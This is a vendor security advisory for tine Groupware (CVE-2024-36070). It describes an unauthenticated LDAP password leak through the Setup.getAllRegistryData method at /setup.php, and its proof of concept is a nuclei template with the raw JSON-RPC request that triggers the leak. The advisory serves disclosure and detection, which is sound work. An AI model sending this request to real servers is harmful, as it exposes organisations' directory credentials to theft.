usd-2024-0002 | Password Leakage in tine 2023.11.2

Product: tine Groupware
Affected Version: prior to 2023.11.8
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Security Risk: High
Vendor: Tine Groupware
Vendor URL: https://www.tine-groupware.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-36070
CVE Link: https://nvd.nist.gov/vuln/detail/cve-2024-36070

Description

Tine Groupware is an open-source web application designed to enhance collaboration and productivity in a team or organization. It offers a wide range of features such as email, calendar, address book, task management, and file sharing.
If the application was configured to use LDAP backend, the credentials are leaked to unauthorized users.

Proof of Concept

The /setup.php endpoint leaks the LDAP password using the Setup.getAllRegistryData method.
An example nuclei template was created to check for the unauthorized access to the method:

id: tine20-unauth-ldap-password-leak
info:
name: Unauthenticated LDAP password leak
author: ChristianPoeschl
severity: high
description: tine leaks LDAP password to unauthenticated users
http:
- raw:
- |
POST setup.php HTTP/1.1
Host: {{Hostname}}
X-Tine20-Request-Type: JSON
{"jsonrpc":"2.0","method":"Setup.getAllRegistryData","params":{},"id":2}
matchers:
- type: word
condition: and
words:
- authenticationData
- configExists
- '"backend":"Ldap"'

Fix

Ensure proper access control.

Users of Tine Groupware should update to a current, patched version.

References

Timeline

  • 2022-04-04: First contact request via info@metaways.de
  • 2024-04-09: Vulnerability is fixed by the vendor, a patched release is planned.
  • 2024-04-11: A patched release is made available on GitHub.

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.